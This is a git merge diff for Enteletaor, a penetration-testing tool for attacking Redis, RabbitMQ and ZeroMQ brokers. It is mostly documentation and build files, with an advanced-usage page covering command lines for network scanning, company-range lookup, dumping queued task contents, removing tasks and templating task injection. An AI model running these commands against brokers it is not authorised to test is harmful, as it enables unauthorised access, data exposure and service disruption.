Merge branch 'develop'

This commit is contained in:
cr0hn
2016-03-04 23:33:59 +01:00
54 changed files with 2720 additions and 1145 deletions

1
.idea/.name generated
View File

@@ -1 +0,0 @@
Enteletaor

15
.idea/Enteletaor.iml generated
View File

@@ -1,15 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<module type="PYTHON_MODULE" version="4">
<component name="NewModuleRootManager">
<content url="file://$MODULE_DIR$">
<sourceFolder url="file://$MODULE_DIR$/enteletaor_lib" isTestSource="false" />
<excludeFolder url="file://$MODULE_DIR$/.idea" />
</content>
<orderEntry type="inheritedJdk" />
<orderEntry type="sourceFolder" forTests="false" />
</component>
<component name="TestRunnerService">
<option name="projectConfiguration" value="py.test" />
<option name="PROJECT_TEST_RUNNER" value="py.test" />
</component>
</module>

22
.idea/STB-Core.iml generated
View File

@@ -1,22 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<module type="PYTHON_MODULE" version="4">
<component name="NewModuleRootManager">
<content url="file://$MODULE_DIR$">
<sourceFolder url="file://$MODULE_DIR$/enteletaor_lib" isTestSource="false" />
<excludeFolder url="file://$MODULE_DIR$/.idea" />
</content>
<orderEntry type="inheritedJdk" />
<orderEntry type="sourceFolder" forTests="false" />
</component>
<component name="PackageRequirementsSettings">
<option name="requirementsPath" value="$MODULE_DIR$/../Enteletaor/requirements.txt" />
</component>
<component name="ReSTService">
<option name="workdir" value="$MODULE_DIR$/../Enteletaor/enteletaor_lib/doc/en" />
<option name="DOC_DIR" value="$MODULE_DIR$/../Enteletaor/enteletaor_lib/doc/en" />
</component>
<component name="TestRunnerService">
<option name="projectConfiguration" value="py.test" />
<option name="PROJECT_TEST_RUNNER" value="py.test" />
</component>
</module>

View File

@@ -1,13 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="ProjectCodeStyleSettingsManager">
<option name="PER_PROJECT_SETTINGS">
<value>
<XML>
<option name="XML_LEGACY_SETTINGS_IMPORTED" value="true" />
</XML>
</value>
</option>
<option name="PREFERRED_PROJECT_CODE_STYLE" value="Default (1)" />
</component>
</project>

View File

@@ -1,7 +0,0 @@
<component name="ProjectDictionaryState">
<dictionary name="Dani">
<words>
<w>enteletaor</w>
</words>
</dictionary>
</component>

6
.idea/encodings.xml generated
View File

@@ -1,6 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="Encoding">
<file url="PROJECT" charset="UTF-8" />
</component>
</project>

15
.idea/enteletaor.iml generated
View File

@@ -1,15 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<module type="PYTHON_MODULE" version="4">
<component name="NewModuleRootManager">
<content url="file://$MODULE_DIR$">
<sourceFolder url="file://$MODULE_DIR$/enteletaor_lib" isTestSource="false" />
<excludeFolder url="file://$MODULE_DIR$/.idea" />
</content>
<orderEntry type="inheritedJdk" />
<orderEntry type="sourceFolder" forTests="false" />
</component>
<component name="TestRunnerService">
<option name="projectConfiguration" value="py.test" />
<option name="PROJECT_TEST_RUNNER" value="py.test" />
</component>
</module>

View File

@@ -1,34 +0,0 @@
<component name="InspectionProjectProfileManager">
<profile version="1.0">
<option name="myName" value="Project Default" />
<option name="myLocal" value="true" />
<inspection_tool class="DocumentWriteJS" enabled="true" level="WARNING" enabled_by_default="true" />
<inspection_tool class="PlatformDetectionJS" enabled="true" level="WARNING" enabled_by_default="true" />
<inspection_tool class="PyMethodMayBeStaticInspection" enabled="false" level="WEAK WARNING" enabled_by_default="false" />
<inspection_tool class="PyPackageRequirementsInspection" enabled="true" level="WARNING" enabled_by_default="true">
<option name="ignoredPackages">
<value>
<list size="15">
<item index="0" class="java.lang.String" itemvalue="execnet" />
<item index="1" class="java.lang.String" itemvalue="cov-core" />
<item index="2" class="java.lang.String" itemvalue="py" />
<item index="3" class="java.lang.String" itemvalue="coverage" />
<item index="4" class="java.lang.String" itemvalue="pytest" />
<item index="5" class="java.lang.String" itemvalue="pytest-cov" />
<item index="6" class="java.lang.String" itemvalue="pytest-xdist" />
<item index="7" class="java.lang.String" itemvalue="wsgiref" />
<item index="8" class="java.lang.String" itemvalue="asyncssh" />
<item index="9" class="java.lang.String" itemvalue="Crypto" />
<item index="10" class="java.lang.String" itemvalue="xlsxwriter" />
<item index="11" class="java.lang.String" itemvalue="BeautifulSoup" />
<item index="12" class="java.lang.String" itemvalue="django-rest-swagger" />
<item index="13" class="java.lang.String" itemvalue="tornado" />
<item index="14" class="java.lang.String" itemvalue="lxml" />
</list>
</value>
</option>
</inspection_tool>
<inspection_tool class="Query_restricted" enabled="false" level="WARNING" enabled_by_default="false" />
<inspection_tool class="XHTMLIncompatabilitiesJS" enabled="true" level="WARNING" enabled_by_default="true" />
</profile>
</component>

View File

@@ -1,7 +0,0 @@
<component name="InspectionProjectProfileManager">
<settings>
<option name="PROJECT_PROFILE" />
<option name="USE_PROJECT_PROFILE" value="false" />
<version value="1.0" />
</settings>
</component>

14
.idea/misc.xml generated
View File

@@ -1,14 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="ProjectLevelVcsManager" settingsEditedManually="false">
<OptionsSetting value="true" id="Add" />
<OptionsSetting value="true" id="Remove" />
<OptionsSetting value="true" id="Checkout" />
<OptionsSetting value="true" id="Update" />
<OptionsSetting value="true" id="Status" />
<OptionsSetting value="true" id="Edit" />
<ConfirmationsSetting value="0" id="Add" />
<ConfirmationsSetting value="0" id="Remove" />
</component>
<component name="ProjectRootManager" version="2" project-jdk-name="Python 3.4.3 virtualenv at ~/.virtualenvs/enteletaor" project-jdk-type="Python SDK" />
</project>

8
.idea/modules.xml generated
View File

@@ -1,8 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="ProjectModuleManager">
<modules>
<module fileurl="file://$PROJECT_DIR$/.idea/enteletaor.iml" filepath="$PROJECT_DIR$/.idea/enteletaor.iml" />
</modules>
</component>
</project>

6
.idea/vcs.xml generated
View File

@@ -1,6 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="VcsDirectoryMappings">
<mapping directory="$PROJECT_DIR$" vcs="Git" />
</component>
</project>

14
.idea/webResources.xml generated
View File

@@ -1,14 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="WebResourcesPaths">
<contentEntries>
<entry url="file://$PROJECT_DIR$">
<entryData>
<resourceRoots>
<path value="file://$PROJECT_DIR$/enteletaor_lib/resources" />
</resourceRoots>
</entryData>
</entry>
</contentEntries>
</component>
</project>

View File

@@ -1,23 +0,0 @@
# Attacks
This document recopile implemented attacks by Enteletaor.
## Specific by broker/MQ
Some attacks only can be done in specific software. Here the list of them:
## Redis
#. Poisoning cache
#. Execute remote script
## Common attacks
These attacks can be executed in all of brokers/MQ:
#. Read remote info
#. Looking for sensible information (i.e. user/password)
#. Remote command injection
#. Listing remote process
#. Remove messages form queues
#. Reject all messages stored in queues to avoid clients to receive them

View File

@@ -15,5 +15,3 @@ global-exclude .DS_Store
global-exclude .mailmap
prune enteletaor_lib/doc*
graft enteletaor_lib/resources/*

View File

@@ -7,15 +7,34 @@ Enteletaor
*Enteletaor: Message Queue & Broker Injection tool*
:Version: 1.0
:Code: https://github.com/cr0hn/enteletaor
:Issues: https://github.com/cr0hn/enteletaor/issues/
:Python version: Python 2 & Python 3
:Documentation: http://enteletaor.readthedocs.org
:Python version: Python 2.7.x & 3
:Author: Daniel Garcia (cr0hn) - @ggdaniel
What's Enteletaor
-----------------
Message Queue & Broker Injection tool that implements attacks to Redis, RabbitMQ and ZeroMQ.
Some of the actions you can do:
- Listing remote tasks.
- Read remote task content.
- Disconnect remote clients from Redis server (even the admin!)
- Inject tasks into remote processes.
- Make a scan to discover open brokers.
Currently supported brokers are:
- RabbitMQ (or AMQP compatible).
- ZeroMQ.
- Redis.
See documentation for more information.
What's new?
-----------
@@ -26,35 +45,4 @@ Version 1.0.0
- First version released
You can read entire list in CHANGELOG file.
Installation
------------
Install Enteletaor is so easy:
.. code-block:: bash
$ python -m pip install enteletaor
Quick start
-----------
You can display inline help writing:
.. code-block:: bash
enteletaor -h
Advanced options
----------------
There are the advanced options:
- **-v**, **-vv**, **-vvv**: Enable verbose mode.
References
----------
* OMSTD (Open Methodology for Security Tool Developers): http://omstd.readthedocs.org
* STB (Security Tool Builder): https://github.com/abirtone/STB
You can read entire list in CHANGELOG file.

177
doc/Makefile Normal file
View File

@@ -0,0 +1,177 @@
# Makefile for Sphinx documentation
#
# You can set these variables from the command line.
SPHINXOPTS =
SPHINXBUILD = sphinx-build
PAPER =
BUILDDIR = build
# User-friendly check for sphinx-build
ifeq ($(shell which $(SPHINXBUILD) >/dev/null 2>&1; echo $$?), 1)
$(error The '$(SPHINXBUILD)' command was not found. Make sure you have Sphinx installed, then set the SPHINXBUILD environment variable to point to the full path of the '$(SPHINXBUILD)' executable. Alternatively you can add the directory with the executable to your PATH. If you don't have Sphinx installed, grab it from http://sphinx-doc.org/)
endif
# Internal variables.
PAPEROPT_a4 = -D latex_paper_size=a4
PAPEROPT_letter = -D latex_paper_size=letter
ALLSPHINXOPTS = -d $(BUILDDIR)/doctrees $(PAPEROPT_$(PAPER)) $(SPHINXOPTS) source
# the i18n builder cannot share the environment and doctrees with the others
I18NSPHINXOPTS = $(PAPEROPT_$(PAPER)) $(SPHINXOPTS) source
.PHONY: help clean html dirhtml singlehtml pickle json htmlhelp qthelp devhelp epub latex latexpdf text man changes linkcheck doctest gettext
help:
@echo "Please use \`make <target>' where <target> is one of"
@echo " html to make standalone HTML files"
@echo " dirhtml to make HTML files named index.html in directories"
@echo " singlehtml to make a single large HTML file"
@echo " pickle to make pickle files"
@echo " json to make JSON files"
@echo " htmlhelp to make HTML files and a HTML help project"
@echo " qthelp to make HTML files and a qthelp project"
@echo " devhelp to make HTML files and a Devhelp project"
@echo " epub to make an epub"
@echo " latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter"
@echo " latexpdf to make LaTeX files and run them through pdflatex"
@echo " latexpdfja to make LaTeX files and run them through platex/dvipdfmx"
@echo " text to make text files"
@echo " man to make manual pages"
@echo " texinfo to make Texinfo files"
@echo " info to make Texinfo files and run them through makeinfo"
@echo " gettext to make PO message catalogs"
@echo " changes to make an overview of all changed/added/deprecated items"
@echo " xml to make Docutils-native XML files"
@echo " pseudoxml to make pseudoxml-XML files for display purposes"
@echo " linkcheck to check all external links for integrity"
@echo " doctest to run all doctests embedded in the documentation (if enabled)"
clean:
rm -rf $(BUILDDIR)/*
html:
$(SPHINXBUILD) -b html $(ALLSPHINXOPTS) $(BUILDDIR)/html
@echo
@echo "Build finished. The HTML pages are in $(BUILDDIR)/html."
dirhtml:
$(SPHINXBUILD) -b dirhtml $(ALLSPHINXOPTS) $(BUILDDIR)/dirhtml
@echo
@echo "Build finished. The HTML pages are in $(BUILDDIR)/dirhtml."
singlehtml:
$(SPHINXBUILD) -b singlehtml $(ALLSPHINXOPTS) $(BUILDDIR)/singlehtml
@echo
@echo "Build finished. The HTML page is in $(BUILDDIR)/singlehtml."
pickle:
$(SPHINXBUILD) -b pickle $(ALLSPHINXOPTS) $(BUILDDIR)/pickle
@echo
@echo "Build finished; now you can process the pickle files."
json:
$(SPHINXBUILD) -b json $(ALLSPHINXOPTS) $(BUILDDIR)/json
@echo
@echo "Build finished; now you can process the JSON files."
htmlhelp:
$(SPHINXBUILD) -b htmlhelp $(ALLSPHINXOPTS) $(BUILDDIR)/htmlhelp
@echo
@echo "Build finished; now you can run HTML Help Workshop with the" \
".hhp project file in $(BUILDDIR)/htmlhelp."
qthelp:
$(SPHINXBUILD) -b qthelp $(ALLSPHINXOPTS) $(BUILDDIR)/qthelp
@echo
@echo "Build finished; now you can run "qcollectiongenerator" with the" \
".qhcp project file in $(BUILDDIR)/qthelp, like this:"
@echo "# qcollectiongenerator $(BUILDDIR)/qthelp/OpenVAS2Report.qhcp"
@echo "To view the help file:"
@echo "# assistant -collectionFile $(BUILDDIR)/qthelp/OpenVAS2Report.qhc"
devhelp:
$(SPHINXBUILD) -b devhelp $(ALLSPHINXOPTS) $(BUILDDIR)/devhelp
@echo
@echo "Build finished."
@echo "To view the help file:"
@echo "# mkdir -p $$HOME/.local/share/devhelp/OpenVAS2Report"
@echo "# ln -s $(BUILDDIR)/devhelp $$HOME/.local/share/devhelp/OpenVAS2Report"
@echo "# devhelp"
epub:
$(SPHINXBUILD) -b epub $(ALLSPHINXOPTS) $(BUILDDIR)/epub
@echo
@echo "Build finished. The epub file is in $(BUILDDIR)/epub."
latex:
$(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) $(BUILDDIR)/latex
@echo
@echo "Build finished; the LaTeX files are in $(BUILDDIR)/latex."
@echo "Run \`make' in that directory to run these through (pdf)latex" \
"(use \`make latexpdf' here to do that automatically)."
latexpdf:
$(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) $(BUILDDIR)/latex
@echo "Running LaTeX files through pdflatex..."
$(MAKE) -C $(BUILDDIR)/latex all-pdf
@echo "pdflatex finished; the PDF files are in $(BUILDDIR)/latex."
latexpdfja:
$(SPHINXBUILD) -b latex $(ALLSPHINXOPTS) $(BUILDDIR)/latex
@echo "Running LaTeX files through platex and dvipdfmx..."
$(MAKE) -C $(BUILDDIR)/latex all-pdf-ja
@echo "pdflatex finished; the PDF files are in $(BUILDDIR)/latex."
text:
$(SPHINXBUILD) -b text $(ALLSPHINXOPTS) $(BUILDDIR)/text
@echo
@echo "Build finished. The text files are in $(BUILDDIR)/text."
man:
$(SPHINXBUILD) -b man $(ALLSPHINXOPTS) $(BUILDDIR)/man
@echo
@echo "Build finished. The manual pages are in $(BUILDDIR)/man."
texinfo:
$(SPHINXBUILD) -b texinfo $(ALLSPHINXOPTS) $(BUILDDIR)/texinfo
@echo
@echo "Build finished. The Texinfo files are in $(BUILDDIR)/texinfo."
@echo "Run \`make' in that directory to run these through makeinfo" \
"(use \`make info' here to do that automatically)."
info:
$(SPHINXBUILD) -b texinfo $(ALLSPHINXOPTS) $(BUILDDIR)/texinfo
@echo "Running Texinfo files through makeinfo..."
make -C $(BUILDDIR)/texinfo info
@echo "makeinfo finished; the Info files are in $(BUILDDIR)/texinfo."
gettext:
$(SPHINXBUILD) -b gettext $(I18NSPHINXOPTS) $(BUILDDIR)/locale
@echo
@echo "Build finished. The message catalogs are in $(BUILDDIR)/locale."
changes:
$(SPHINXBUILD) -b changes $(ALLSPHINXOPTS) $(BUILDDIR)/changes
@echo
@echo "The overview file is in $(BUILDDIR)/changes."
linkcheck:
$(SPHINXBUILD) -b linkcheck $(ALLSPHINXOPTS) $(BUILDDIR)/linkcheck
@echo
@echo "Link check complete; look for any errors in the above output " \
"or in $(BUILDDIR)/linkcheck/output.txt."
doctest:
$(SPHINXBUILD) -b doctest $(ALLSPHINXOPTS) $(BUILDDIR)/doctest
@echo "Testing of doctests in the sources finished, look at the " \
"results in $(BUILDDIR)/doctest/output.txt."
xml:
$(SPHINXBUILD) -b xml $(ALLSPHINXOPTS) $(BUILDDIR)/xml
@echo
@echo "Build finished. The XML files are in $(BUILDDIR)/xml."
pseudoxml:
$(SPHINXBUILD) -b pseudoxml $(ALLSPHINXOPTS) $(BUILDDIR)/pseudoxml
@echo
@echo "Build finished. The pseudo-XML files are in $(BUILDDIR)/pseudoxml."

Binary file not shown.

After

Width:  |  Height:  |  Size: 25 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 17 KiB

File diff suppressed because it is too large Load Diff

Before

Width:  |  Height:  |  Size: 14 KiB

After

Width:  |  Height:  |  Size: 15 KiB

242
doc/make.bat Normal file
View File

@@ -0,0 +1,242 @@
@ECHO OFF
REM Command file for Sphinx documentation
if "%SPHINXBUILD%" == "" (
set SPHINXBUILD=sphinx-build
)
set BUILDDIR=build
set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% source
set I18NSPHINXOPTS=%SPHINXOPTS% source
if NOT "%PAPER%" == "" (
set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%
set I18NSPHINXOPTS=-D latex_paper_size=%PAPER% %I18NSPHINXOPTS%
)
if "%1" == "" goto help
if "%1" == "help" (
:help
echo.Please use `make ^<target^>` where ^<target^> is one of
echo. html to make standalone HTML files
echo. dirhtml to make HTML files named index.html in directories
echo. singlehtml to make a single large HTML file
echo. pickle to make pickle files
echo. json to make JSON files
echo. htmlhelp to make HTML files and a HTML help project
echo. qthelp to make HTML files and a qthelp project
echo. devhelp to make HTML files and a Devhelp project
echo. epub to make an epub
echo. latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter
echo. text to make text files
echo. man to make manual pages
echo. texinfo to make Texinfo files
echo. gettext to make PO message catalogs
echo. changes to make an overview over all changed/added/deprecated items
echo. xml to make Docutils-native XML files
echo. pseudoxml to make pseudoxml-XML files for display purposes
echo. linkcheck to check all external links for integrity
echo. doctest to run all doctests embedded in the documentation if enabled
goto end
)
if "%1" == "clean" (
for /d %%i in (%BUILDDIR%\*) do rmdir /q /s %%i
del /q /s %BUILDDIR%\*
goto end
)
%SPHINXBUILD% 2> nul
if errorlevel 9009 (
echo.
echo.The 'sphinx-build' command was not found. Make sure you have Sphinx
echo.installed, then set the SPHINXBUILD environment variable to point
echo.to the full path of the 'sphinx-build' executable. Alternatively you
echo.may add the Sphinx directory to PATH.
echo.
echo.If you don't have Sphinx installed, grab it from
echo.http://sphinx-doc.org/
exit /b 1
)
if "%1" == "html" (
%SPHINXBUILD% -b html %ALLSPHINXOPTS% %BUILDDIR%/html
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/html.
goto end
)
if "%1" == "dirhtml" (
%SPHINXBUILD% -b dirhtml %ALLSPHINXOPTS% %BUILDDIR%/dirhtml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/dirhtml.
goto end
)
if "%1" == "singlehtml" (
%SPHINXBUILD% -b singlehtml %ALLSPHINXOPTS% %BUILDDIR%/singlehtml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/singlehtml.
goto end
)
if "%1" == "pickle" (
%SPHINXBUILD% -b pickle %ALLSPHINXOPTS% %BUILDDIR%/pickle
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can process the pickle files.
goto end
)
if "%1" == "json" (
%SPHINXBUILD% -b json %ALLSPHINXOPTS% %BUILDDIR%/json
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can process the JSON files.
goto end
)
if "%1" == "htmlhelp" (
%SPHINXBUILD% -b htmlhelp %ALLSPHINXOPTS% %BUILDDIR%/htmlhelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can run HTML Help Workshop with the ^
.hhp project file in %BUILDDIR%/htmlhelp.
goto end
)
if "%1" == "qthelp" (
%SPHINXBUILD% -b qthelp %ALLSPHINXOPTS% %BUILDDIR%/qthelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can run "qcollectiongenerator" with the ^
.qhcp project file in %BUILDDIR%/qthelp, like this:
echo.^> qcollectiongenerator %BUILDDIR%\qthelp\OpenVAS2Report.qhcp
echo.To view the help file:
echo.^> assistant -collectionFile %BUILDDIR%\qthelp\OpenVAS2Report.ghc
goto end
)
if "%1" == "devhelp" (
%SPHINXBUILD% -b devhelp %ALLSPHINXOPTS% %BUILDDIR%/devhelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished.
goto end
)
if "%1" == "epub" (
%SPHINXBUILD% -b epub %ALLSPHINXOPTS% %BUILDDIR%/epub
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The epub file is in %BUILDDIR%/epub.
goto end
)
if "%1" == "latex" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
if errorlevel 1 exit /b 1
echo.
echo.Build finished; the LaTeX files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "latexpdf" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
cd %BUILDDIR%/latex
make all-pdf
cd %BUILDDIR%/..
echo.
echo.Build finished; the PDF files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "latexpdfja" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
cd %BUILDDIR%/latex
make all-pdf-ja
cd %BUILDDIR%/..
echo.
echo.Build finished; the PDF files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "text" (
%SPHINXBUILD% -b text %ALLSPHINXOPTS% %BUILDDIR%/text
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The text files are in %BUILDDIR%/text.
goto end
)
if "%1" == "man" (
%SPHINXBUILD% -b man %ALLSPHINXOPTS% %BUILDDIR%/man
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The manual pages are in %BUILDDIR%/man.
goto end
)
if "%1" == "texinfo" (
%SPHINXBUILD% -b texinfo %ALLSPHINXOPTS% %BUILDDIR%/texinfo
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The Texinfo files are in %BUILDDIR%/texinfo.
goto end
)
if "%1" == "gettext" (
%SPHINXBUILD% -b gettext %I18NSPHINXOPTS% %BUILDDIR%/locale
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The message catalogs are in %BUILDDIR%/locale.
goto end
)
if "%1" == "changes" (
%SPHINXBUILD% -b changes %ALLSPHINXOPTS% %BUILDDIR%/changes
if errorlevel 1 exit /b 1
echo.
echo.The overview file is in %BUILDDIR%/changes.
goto end
)
if "%1" == "linkcheck" (
%SPHINXBUILD% -b linkcheck %ALLSPHINXOPTS% %BUILDDIR%/linkcheck
if errorlevel 1 exit /b 1
echo.
echo.Link check complete; look for any errors in the above output ^
or in %BUILDDIR%/linkcheck/output.txt.
goto end
)
if "%1" == "doctest" (
%SPHINXBUILD% -b doctest %ALLSPHINXOPTS% %BUILDDIR%/doctest
if errorlevel 1 exit /b 1
echo.
echo.Testing of doctests in the sources finished, look at the ^
results in %BUILDDIR%/doctest/output.txt.
goto end
)
if "%1" == "xml" (
%SPHINXBUILD% -b xml %ALLSPHINXOPTS% %BUILDDIR%/xml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The XML files are in %BUILDDIR%/xml.
goto end
)
if "%1" == "pseudoxml" (
%SPHINXBUILD% -b pseudoxml %ALLSPHINXOPTS% %BUILDDIR%/pseudoxml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The pseudo-XML files are in %BUILDDIR%/pseudoxml.
goto end
)
:end

1
doc/source/__init__.py Normal file
View File

@@ -0,0 +1 @@
# -*- coding: utf-8 -*-

663
doc/source/advanced.rst Normal file
View File

@@ -0,0 +1,663 @@
Advanced usage
==============
Enteleteaor implements many attacks and options to interact with different brokers:
- Redis
- RabbitMQ (of AMQP compabible)
- ZeroMQ
Also implements some attacks specifics for Redis server. This document try to collect this information.
There are the 3 type actions implemented:
- Scanning
- Redis actions
- Tasks actions
Scanner
-------
Enteleteaor implements a scanner to aims to detect open brokers. The scanning is implemented in pure python, with no external dependecies, like ``nmap``.
The reason to implement a native scanner si because in ``nmap`` v7 no all scripts that detects open services works.
.. note::
You also can pass as target a hostname, not only and IP.
Custom ports
++++++++++++
As you can read in :doc:`quickstart` document, you can scan a single host or a network. Syntax is nmap-like.
You can specify other ports that enteleteaor default, using ``-p`` option:
.. code-block:: bash
# enteleteaor scan -t 10.10.0.10/16 -p 5550,5551
Parallel scanning
+++++++++++++++++
By default, enteleteaor runs 20 concurrent scanning. Internally it's implemented with greenlets threads. It means that are not "real" threads. You can think about greenlets thread as a lightweight version of threads.
We recommend can use 40 concurrent scanning threads. Don't worry for the overload of your system, green threads will made this possible without a hungry CPU process.
To change concurrency, you can use ``-c`` option:
.. code-block:: bash
# enteleteaor scan -t 10.10.0.10/24 -c 40
Saving results
++++++++++++++
Enteleteaor can export scan results as a JSON format, using ``--output`` option:
.. code-block:: bash
# enteleteaor scan -t 10.10.0.10 --output results
Or:
.. code-block:: bash
# enteleteaor scan -t 10.10.0.10 --output results.json
.. note::
If you don't indicate the file extension, enteleteaor will add it for you.
Company lookup
++++++++++++++
This is a bit strange option. Typing ``-o`` enteleteaor will try to lookup the company name in RIPE, get all the IP ranges registered for it and add to scan.
For example, if you try to get scan ``google.com`` it will 1465 new host:
.. code-block:: bash
# enteletaor -vvvv scan -t google.com -o
[ * ] Starting Enteletaor execution
[ * ] -> Detected registered network '80.239.142.192/26'. Added for scan.
[ * ] -> Detected registered network '213.242.89.64/26'. Added for scan.
[ * ] -> Detected registered network '92.45.86.16/28'. Added for scan.
[ * ] -> Detected registered network '212.179.82.48/28'. Added for scan.
[ * ] -> Detected registered network '217.163.1.64/26'. Added for scan.
[ * ] -> Detected registered network '80.239.174.64/26'. Added for scan.
[ * ] -> Detected registered network '213.253.9.128/26'. Added for scan.
[ * ] -> Detected registered network '46.108.1.128/26'. Added for scan.
[ * ] -> Detected registered network '213.248.112.64/26'. Added for scan.
[ * ] -> Detected registered network '46.61.155.0/24'. Added for scan.
[ * ] -> Detected registered network '95.167.107.32/27'. Added for scan.
[ * ] -> Detected registered network '195.50.84.192/26'. Added for scan.
[ * ] -> Detected registered network '80.239.168.192/26'. Added for scan.
[ * ] -> Detected registered network '193.120.166.64/26'. Added for scan.
[ * ] -> Detected registered network '213.155.151.128/26'. Added for scan.
[ * ] -> Detected registered network '194.44.4.0/24'. Added for scan.
[ * ] -> Detected registered network '80.239.229.192/26'. Added for scan.
[ * ] -> Detected registered network '213.242.93.192/26'. Added for scan.
[ * ] -> Detected registered network '195.100.224.112/28'. Added for scan.
[ * ] -> Detected registered network '89.175.35.32/28'. Added for scan.
[ * ] -> Detected registered network '89.175.165.0/28'. Added for scan.
[ * ] -> Detected registered network '89.175.162.48/29'. Added for scan.
[ * ] - Number of targets to analyze: 1465
[ * ] - Starting scan
...
Tasks
-----
Currently you can do 4 sub-actions for tasks.
All of these actions are available only if broker is open. An open broker means that not credential are needed for connect to.
.. note::
But.. what's a task? Oks, no problem, let's see:
When we use a process manager to handle background tasks they use an external communication system. This communication system usually is a broker.
The processes managers need this communication systems to send the information to be executed to the runner. Each runner is waiting for new information to process. and the broker permit delegate the exchange problems.
So, we call this in information a ``pending task``. This ``task`` is really some information waiting in the broker to be send to the runner.
Listing remote tasks
++++++++++++++++++++
Basic usage
___________
If there are pending tasks in broker queue, we can analyze them. Enteleteaor allow us to list all tasks found. Although there is more than one task of each type in queue, only the task definition is displayed:
.. code-block:: bash
# enteleteaor -v tasks list-tasks -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] - Trying to connect with server...
[ * ] - Remote process found:
[ * ] -> tasks.sum (param_0:int, param_1:int)
[ * ] -> tasks.send_mail (param_0:str, param_1:str, param_2:str)
[ * ] Done!
We can see that broker has 2 task definition stored:
- tasks.sum
- tasks.send_mail
Export Template
_______________
Enteleteaor also permit inject new tasks to broker (see bellow). The way to inject them is to pass as input a JSON file with the information. Write this file must be a bit hard. To help us, enteleteaor can export a template.
With this template, we only must fill the appropriate field:
.. code-block:: bash
:linenos:
:emphasize-lines: 8
# enteleteaor -v tasks list-task -t 10.10.0.10 -T my_template -F tasks.send_mail
[ * ] Starting Enteletaor execution
[ * ] - Trying to connect with server...
[ * ] - Remote process found:
[ * ] -> tasks.sum (param_0:int, param_1:int)
[ * ] -> tasks.send_mail (param_0:str, param_1:str, param_2:str)
[ * ] - Building template...
[ * ] - Template saved at: '/Users/Dani/Documents/Projects/enteletaor/enteletaor_lib/my_template.json'
[ * ] Done!
# cat my_template.json
[{"parameters": [{"param_position": 0, "param_value": null, "param_type": "str"}, {"param_position": 1, "param_value": null, "param_type": "str"}, {"param_position": 2, "param_value": null, "param_type": "str"}], "function": "tasks.send_mail"}]
In this example only export the function ``tasks.send_mail``.
Removing tasks
++++++++++++++
We also can remove all pending task from the broker queue. It's so simple:
.. code-block:: bash
# enteleteaor tasks remove -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] - Trying to connect with server...
[ * ] - All tasks removed from '10.10.0.10'
[ * ] Done!
Dumping tasks content
+++++++++++++++++++++
Basic usage
___________
We can dump the content of tasks simply using raw-dump sub-command:
.. code-block:: bash
# enteleteaor tasks raw-dump -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] - Trying to connect with server...
[ * ] Found process information:
[ * ] - Remote tasks name: 'tasks.sum'
[ * ] - Input parameters:
[ * ] -> P0: 1
[ * ] -> P1: 0
[ * ] Found process information:
[ * ] - Remote tasks name: 'tasks.send_mail'
[ * ] - Input parameters:
[ * ] -> P0: marquerite@cordell.com
[ * ] -> P1: Can You Afford?
[ * ] -> P2: Axis alliance with Italy and Japan.
[ * ] Found process information:
[ * ] - Remote tasks name: 'tasks.send_mail'
[ * ] - Input parameters:
[ * ] -> P0: amie@cordell.com
[ * ] -> P1: Read your review for John Mulaney You're missing out on points Not Cool, Guys DO NOT Commit These Instagram Atrocities
[ * ] -> P2: MolotovRibbentrop Pact of August 1939, Germany and subsequent declarations of war in Europe concluded with an invasion of Poland by Germany and the subsequent German unconditional surrender on 8 May 1945.
[ * ] Found process information:
[ * ] - Remote tasks name: 'tasks.send_mail'
[ * ] - Input parameters:
[ * ] -> P0: willard@cordell.com
[ * ] -> P1: Wish What are our customers saying?
[ * ] -> P2: In June 1941, the European Axis powers and the coalition of the world.
[ * ] -> No more messages from server. Exiting...
[ * ] Done!
Streaming mode
______________
Some time we could want to listen in real time new messages available in broker. If we use ``--streaming`` option, enteleteaor will wait for new messages:
.. code-block:: bash
:linenos:
:emphasize-lines: 17-20
# enteleteaor tasks raw-dump -t 10.10.0.10 --streaming
[ * ] Starting Enteletaor execution
[ * ] - Trying to connect with server...
